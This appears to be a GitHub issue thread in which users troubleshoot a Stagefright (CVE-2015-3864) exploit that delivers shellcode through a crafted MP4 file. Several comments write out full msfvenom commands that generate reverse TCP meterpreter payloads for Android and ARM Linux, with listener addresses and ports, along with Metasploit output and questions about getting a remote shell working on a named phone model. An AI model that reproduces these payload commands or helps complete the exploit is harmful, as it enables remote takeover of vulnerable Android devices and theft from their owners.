Open umerov1999 opened 8 years ago
eudemonics
commented
8 years ago i generated it with msfvenom actually but haven't been able to get it working successfully, so i suggest using your own shellcode. the included shellcode is supposed to be a reverse tcp shell for android arm architecture.
umerov1999
commented
8 years ago I generated shellcode.bin with msfvenom(msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.21 lport=1996 R > shellcode.bin) and created exploit.mp4, but this exploit doesn't work in my device(Samsung Galaxy Note 8, armv7-a , Android 4.4.4 official) my device is vulnerable to cve-2015-3864(tested in Zimperium Stagefright Detector).
sgang007
commented
8 years ago @eudemonics Can you give any working shellcode or tell how to generate one to test the code.
umerov1999
commented
8 years ago umerov1999
commented
8 years ago This shellcode armle/linux/reverse_tcp
dadreamer
commented
7 years ago @umerov1999 Thx for this hint, I was trying to build a shellcode for android, not for linux. So, it should look something like this:
msf > msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
[*] exec: msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 200 bytesDid you get the reverse shell successfully with the code, you've posted above? I don't with mine and I'm unsure how to test it.
How to make a shellcode for this exploit. You shellcode.bin is the apk file, is that correct? You tested this exploit?(Как сделать шелл-код для эксплоита. У вас shellcode.bin является apk файлом. Это правильно и вы тестировали этот эксплоит?)